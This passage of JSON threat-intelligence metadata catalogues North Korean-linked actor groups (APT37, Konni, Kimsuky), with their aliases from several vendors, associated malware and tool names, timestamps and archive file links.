"created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434707, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d0a0a5f2b671b004318874f8d2683e3ce5bd42f3.pdf", "text": "https://archive.orkl.eu/d0a0a5f2b671b004318874f8d2683e3ce5bd42f3.txt", "img": "https://archive.orkl.eu/d0a0a5f2b671b004318874f8d2683e3ce5bd42f3.jpg" } }